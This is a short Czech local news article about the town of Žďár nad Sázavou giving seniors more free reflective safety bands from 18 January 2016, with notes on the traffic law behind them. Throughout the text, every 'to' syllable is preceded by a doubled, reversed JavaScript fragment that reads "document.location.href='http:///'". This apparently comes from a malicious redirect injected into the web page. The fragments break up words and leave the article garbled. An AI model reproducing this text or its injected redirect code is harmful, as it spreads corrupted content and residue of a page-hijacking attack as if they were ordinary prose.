Rainbow page separator

Další reflexní pásky si mohou senioři vyzvednout od 18. ledna

Neděle, 10. ledna 2016

reflexní pásky města Žďár nad Sázavou

Žďár nad Sázavou / Další reflexní bezpečnostní pásky dostanou zdarma k dispozici žďárští senioři, o [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to od 18. ledna. „Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že se podařilo seniory oslovit a s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovky reflexních pásků si již vzali, budou si moci v informační kanceláři městského úřadu od 18. ledna vyzvednout další,“ uvedla mluvčí žďárské radnice Nikola Adlerová.
Pásky jsou vhodné pro všechny chodce, na tmavém oblečení a v mlze se na nich odráží světlomety au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobilů. Podle novely zákona o provozu na pozemních komunikacích by chodci měli mimo obec povinně používat alespoň jeden reflexní prvek na oděvu, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pokud se za snížené viditelnosti pohybují po vozovce bez veřejného osvětlení.
Reflexní pásky s logem si žďárská radnice nechává vyrábět jako propagační předmět města. Za pětadvacet korun si je mohou ostatní zájemci zakoupit nejenom v informační kanceláři městského úřadu v Žižkově ulici, ale také v informačním centru ve Staré radnici.
Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: facebook města Žďár nad Sázavou